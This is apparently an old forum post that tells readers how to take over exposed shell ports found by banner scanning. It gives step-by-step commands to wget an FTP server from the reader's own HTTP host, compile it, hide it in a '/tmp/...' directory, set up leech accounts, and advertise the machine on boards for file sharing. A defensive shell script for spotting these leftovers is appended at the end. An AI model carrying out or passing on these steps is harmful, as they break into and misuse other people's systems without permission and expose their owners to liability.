While trying to scan for Remote Administrator servers without a password, I encountered some weird results from the banner scan on the IPs which had port 4000 open. Sometimes I got banners like these:
sh-2.05$
bash#
sh-2.04#
bash$
Since I knew very little about Unix systems, I first just left them for what they were.
Then I remembered there was a shell on Unix named bash. So I telnetted to the port and came to the bash$ banner. I tried some Unix commands like whoami, ls and df, and damn, it was a Unix shell. So I tried making it useful by installing an FTP server...
[Basic system info]
To get a bit more information on the running system (HD size, OS) there are a few commands. Mostly you are not root on the server but some other user. You can see this simply by looking at the sign at the end of the shell prompt.
bash# = root
bash$ = normal user
[OS]
A little trick to find out the operating system is to view the /etc/issue file. You can view the file by typing *cat /etc/issue*. The system in the example below is running Red Hat 6.2.
bash$ cat /etc/issue
cat /etc/issue
Red Hat Linux release 6.2 (Zoot)
Kernel 2.4.17 on a 2-processor i686
bash$
bash$
[df command]
The df command gives you information about the HD partitions on the system. In the example below you can see there are 2 partitions of about 17 GB mounted on /home and /usr.
bash$ df
df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/sda8 280005 89497 176052 34% /
/dev/sda1 31079 6887 22588 23% /boot
/dev/sda6 17059884 13152408 3041576 81% /home
/dev/sda5 17059884 3098788 13095196 19% /usr
/dev/sda7 280005 205982 59567 78% /var
bash$
bash$
[Installing a FTP server]
A lot of common Linux FTP servers (glftpd, proftpd, pureftpd) need root to be installed. This is a problem because most times we are not root. We need a special ftpd that doesn't require root to install. I attached ftp4all to this thread; this is the only non-root FTP server I found that worked. If you find any other, please let me know.
Now let's download the ftp4all server to the Unix box. Go to the server's tmp dir by typing "cd /tmp". We are going to use wget to download the ftp4all server to the machine. wget is a program to download files from an HTTP server; this means you need to store the ftp4all server package on an HTTP server. Download the file with this command.
bash$ wget http://*.*.*.*/ftpd-3.012.tar.gz
wget http://*.*.*.*/ftpd-3.012.tar.gz
--09:19:11-- http://*.*.*.*/ftpd-3.012.tar.gz
=> `ftpd-3.012.tar.gz'
Connecting to *.*.*.*:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 140,779 [application/x-gzip]
0K .......... .......... .......... .......... .......... 36% @ 84.75 KB/s
50K .......... .......... .......... .......... .......... 72% @ 42.77 KB/s
100K .......... .......... .......... ....... 100% @ 12.85 KB/s
09:19:16 (29.40 KB/s) - `ftpd-3.012.tar.gz' saved [140779/140779]
bash$
Type "ls" to see if the file was downloaded successfully.
bash$ ls
ls
ftpd-3.012.tar.gz
bash$
Now we need to extract the gzip file; we do this with the tar command. Type "tar -zxvf ftpd-3.012.tar.gz".
Now you will see the program extract all the files.
When completed, type "ls" again; you should see a new dir named "ftpd-3.012".
Enter that dir with "cd ftpd-3.012".
The next thing is to configure the FTP server before actually compiling the files.
Type "./configure". This might take a little while but should complete WITHOUT errors. If you see errors you can stop and try a new server, because the FTP server cannot be installed on this system.
After configuring you can set up the listening port and the FTP root of the server in the ftpd.reg file.
This file is located in the standard/etc/ dir. Delete the file by typing "rm ftpd.reg". Now you need to edit the file on your own computer. Set the basedir to "/tmp/..." and the port to 444. Save and upload it to the same HTTP server where you uploaded the ftpd-3.012.tar.gz file. Now download the file to the Unix machine with wget: "wget http://*.*.*.*/ftpd.reg".
OK, now go back to the /tmp/ftpd-3.012/ dir by typing "cd ../../". Type "pwd" to check if you are in the correct dir. Now you have to compile the FTP server files; this is all done automatically when you type "make". This might take a while but has to complete without errors. Now your server is compiled and almost ready for use.
We first need to make the basedir we typed in the ftpd.reg file. Go to the /tmp dir by typing "cd /tmp", then type "mkdir ..." to make a hidden directory.
Now go back to the /tmp/ftpd-3.012/ dir by typing "cd ftpd-3.012".
You need to copy the binary files to the /tmp/ftpd-3.012/standard/sbin/ dir.
You can do this by typing "cp bin/* standard/sbin".
Now type "cd standard/sbin" and type "./ftpd" to start the server.
You should get this result:
FTP4ALL 3.010, Copyright © 1996-1999 by Crescent (crescent@ftp4all.de)
This program is FREE SOFTWARE and distributed under GNU PUBLIC LICENSE
Server on host supernova is ready and listening on ANY_IP_ADDRESS:2000
Base directory : /tmp/.../
Readme file : (none)
Permission file: .permissions
Errlog file : log/ftpd.err
Log file : log/ftpd.log
Log program : (none)
Server program : /tmp/ftpd-3.012/standard/sbin/ftps
Now connect to port 444 with FlashFXP, using username root with any password.
CONGRATZ YOU NOW HAVE INSTALLED THE FTP SERVER SUCCESSFULLY !!!!!
[Starting Commands]
To add users, give the root account a password and do some basic operations, we have some commands.
First type these 2 commands in FlashFXP raw commands:
site passwd secret
site group add root 0
The first command gives user root the password secret.
The second command adds user root to group 0.
Next type these commands:
site chown root:root /
site chmod o+lc
site chmodr go=clg /
site chmodr go=r /
I'm not gonna explain them all; if you want to know what they mean, check the readme file included in the ftpd-3.012.tar.gz package.
Now we need to add a leech user.
This command adds a user leech:
site user add leech
This command gives user leech the password leecher:
site passwd leech leecher
This command determines the max amount of logins for user leech:
site user change leech logins=10
And this last command gives user leech download access and gives it no IP mask:
site user change uni class=n ip0=*.*.*.*
Now upload your stuff.
When finished uploading, you HAVE to type these 2 commands to give the files download permissions.
site chmodr go=cl /
site chmodr go=r /
Now you can post the server at your boards.
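
For an administrator checking a host for what the steps above leave behind (a directory named "..." under /tmp, a compiled server in a temp directory, and a process started from it), the following audit script is an added example, not part of the original post. The default roots /tmp, /var/tmp and /dev/shm are an assumption; pass your own as arguments.

```shell
#!/bin/sh
# Added example, not from the original post. Audits world-writable temp
# directories for what the install steps leave behind. Roots are arguments.

# Directories named only with dots/spaces ("...", ".. "), which `ls` hides
# and which `ls -a` makes easy to misread as "." or "..".
find_dot_dirs() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        find "$root" -xdev -type d -name '.*' 2>/dev/null |
            sed -n '/\/\.[. ][. ]*$/p'
    done
}

# Regular files with the owner-execute bit set: compiled daemons and build
# trees do not normally belong in a temp directory.
find_executables() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        find "$root" -xdev -type f -perm -100 2>/dev/null || true
    done
}

# Linux only: PIDs whose executable image lives under one of the roots,
# e.g. a server started with "./ftpd" from an unpacked tree in /tmp.
# A binary deleted after start still shows up, as "<path> (deleted)".
procs_running_from() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        for root in "$@"; do
            case "$exe" in "$root"/*) echo "${p#/proc/} $exe" ;; esac
        done
    done
}

audit_tmp() {
    echo "== dot-named directories";  find_dot_dirs "$@"
    echo "== executable files";       find_executables "$@"
    echo "== processes running from"; procs_running_from "$@"
}

# Default roots are an assumption; pass your own as arguments.
if [ "$#" -gt 0 ]; then audit_tmp "$@"; else audit_tmp /tmp /var/tmp /dev/shm; fi
```

Run it as root so that /proc/PID/exe is readable for every process; mounting the temp file systems with noexec stops the "./ftpd" step outright.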




